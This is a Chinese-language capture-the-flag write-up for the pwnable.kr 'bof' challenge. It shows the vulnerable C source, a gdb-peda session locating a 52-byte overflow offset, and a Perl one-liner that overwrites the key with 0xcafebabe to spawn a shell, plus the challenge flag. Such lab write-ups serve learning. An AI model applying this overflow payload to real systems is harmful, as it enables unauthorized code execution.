bof(pwnable.kr_bof)緩衝區溢位簡單利用

下載連線中的原始碼和二進位制檔案後，檢視原始碼如下

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else
 
{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

判斷這個時考察緩衝區溢位的題目，漏洞產生原因時gets()函式對輸入的資料長度沒有做檢查，導致溢位，上gdb分析

root@kali-linux:~/文件/PWN/pwnable.kr/3.bof# gdb -q ./bof

warning: build/bdist.linux-x86_64/wheel/peda/peda.py: No such file or directory
Reading symbols from ./bof...(no debugging symbols found)...done.
gdb-peda$ pattern_creat 150
 

'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA'
gdb-peda$ r
Starting program: /root/文件/PWN/pwnable.kr/3.bof/bof 
overflow me : 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA
Nah..
*** stack smashing detected ***: /root/文件/PWN/pwnable.kr/3
 
.bof/bof terminated

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x31414162 ('bAA1')
EBX: 0xf7fcf000 --> 0x1bef0 
ECX: 0xffffd210 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA")
EDX: 0xf7ffd4fc --> 0x0 
ESI: 0xffffc9e0 --> 0x0 
EDI: 0xffffc9e0 --> 0x0 
EBP: 0xffffcab8 --> 0xffffcb18 --> 0xf7fa4000 --> 0x1b2db0 
ESP: 0xffffc910 --> 0x40000000 ('')
EIP: 0xf7fc6886 (cmp    WORD PTR [eax],0xb858)
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7fc687e:  xchg   ax,ax
   0xf7fc6880:  mov    ecx,DWORD PTR [eax+0x48]
   0xf7fc6883:  mov    eax,DWORD PTR [eax+0x4c]
=> 0xf7fc6886:  cmp    WORD PTR [eax],0xb858
   0xf7fc688b:  je     0xf7fc6b28
   0xf7fc6891:  cmp    BYTE PTR [eax],0xb8
   0xf7fc6894:  jne    0xf7fc68b0
   0xf7fc6896:  cmp    DWORD PTR [eax+0x1],0xad
[------------------------------------stack-------------------------------------]
0000| 0xffffc910 --> 0x40000000 ('')
0004| 0xffffc914 --> 0x0 
0008| 0xffffc918 --> 0xffffc960 --> 0x0 
0012| 0xffffc91c --> 0xf7fcf000 --> 0x1bef0 
0016| 0xffffc920 --> 0x0 
0020| 0xffffc924 --> 0x0 
0024| 0xffffc928 --> 0x0 
0028| 0xffffc92c --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xf7fc6886 in ?? () from /lib/i386-linux-gnu/libgcc_s.so.1
gdb-peda$ pattern_offset AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA
AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA found at offset: 52

判斷溢位的偏移位數為52，而在程式碼中：

if(key == 0xcafebabe){
        system("/bin/sh");
    }

需要將key所在的記憶體資料替換為0xcafebabe，而通過file命令我們可以知道本程式為32位程式，採用小端序，因此我們只需構造”A”*52+”“\xbe\xba\xfe\xca”來進行溢位

root@kali-linux:~/文件/PWN/pwnable.kr/3.bof# file bof
bof: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=ed643dfe8d026b7238d3033b0d0bcc499504f273, not stripped

poc

(perl -e 'print "A"x52 . "\xbe\xba\xfe\xca\n"'; cat -) | ./bof

即可執行/bin/sh來cat flag:

daddy, I just pwned a buFFer :)